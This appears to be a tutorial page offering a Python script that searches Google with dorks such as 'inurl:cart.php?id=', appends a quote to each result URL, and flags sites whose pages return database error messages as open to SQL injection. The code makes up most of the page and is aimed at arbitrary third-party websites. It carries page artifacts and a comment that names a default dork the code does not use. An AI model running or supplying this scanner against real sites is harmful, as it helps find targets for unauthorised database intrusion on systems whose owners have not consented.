This script will teach you how to auto find the vulnerability sites of SQL injection in the google search engine.
Prerequisites You only need Python to run this script. You can visit here to download Python. but you need to install the requirements package first!
Requirements:
- requests
Run the Script:
python3 main.pyCode language: CSS (css)Use of the Script:
kali@kali$ python3 main.py [?] dork: [inurl:cart.php?id=] [?] total page : 25
you will see the following results hereCode language: CSS (css)Source Code:
main.py
import sys
import re
# the error contans for sql injection vulnerable
errors = {'MySQL': 'error in your SQL syntax',
'MiscError': 'mysql_fetch',
'MiscError2': 'num_rows',
'Oracle': 'ORA-01756',
'JDBC_CFM': 'Error Executing Database Query',
'JDBC_CFM2': 'SQLServer JDBC Driver',
'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',
'MSSQL_Uqm': 'Unclosed quotation mark',
'MS-Access_ODBC': 'ODBC Microsoft Access Driver',
'MS-Access_JETdb': 'Microsoft JET Database',
'Error Occurred While Processing Request' : 'Error Occurred While Processing Request',
'Server Error' : 'Server Error',
'Microsoft OLE DB Provider for ODBC Drivers error' : 'Microsoft OLE DB Provider for ODBC Drivers error',
'Invalid Querystring' : 'Invalid Querystring',
'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC',
'VBScript Runtime' : 'VBScript Runtime',
'ADODB.Field' : 'ADODB.Field',
'BOF or EOF' : 'BOF or EOF',
'ADODB.Command' : 'ADODB.Command',
'JET Database' : 'JET Database',
'mysql_fetch_array()' : 'mysql_fetch_array()',
'Syntax error' : 'Syntax error',
'mysql_numrows()' : 'mysql_numrows()',
'GetArray()' : 'GetArray()',
'FetchRow()' : 'FetchRow()',
'Input string was not in a correct format' : 'Input string was not in a correct format',
'Not found' : 'Not found'}
try:
import requests
import googlesearch
# the function to exploit the google hacking databases
def Exploit(dork,total_page):
# this require google search engine
user_agent = {"User-agent":"Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"}
Total_page = int(total_page)
for b in googlesearch.search(dork, num=Total_page):
web = b+"'" # add ' to end the result url. to check if website is vuln by SQL Injection
# using requests
r = requests.get(web, headers=user_agent)
webs = r.text
# return errors dictionary to find the error problem matches
for Type, ErrorMessage in errors.items():
if re.search(ErrorMessage, webs):
# append the list of vulnerability website to result
print(" \033[41m\033[30mVULN\033[40m\033[37m {0}\n Vulnerability Type: \033[31m{1}".format(b,Type))
# doing the while input
while True:
# going to ask your dork
dork = input("[?] dork: [inurl:cart.php?id=] ")
total_page = input("[?] total page : ")
# if you input the empty dork. this will set the default dork as 'inurl:products.php?id='
if not dork:
Exploit(dork = "inurl:cart.php?id=",
total_page = total_page)
else:
Exploit(dork = dork,total_page = total_page)
except ImportError:
# this error will display on your terminal if you havent
# installed the google module
print("[!] You havent installed the required modules!\n[+] to install that packages. run 'pip3 install -r requirements.txt' on your terminal\n")
sys.exit()
except KeyboardInterrupt:
sys.exit()Code language: PHP (php)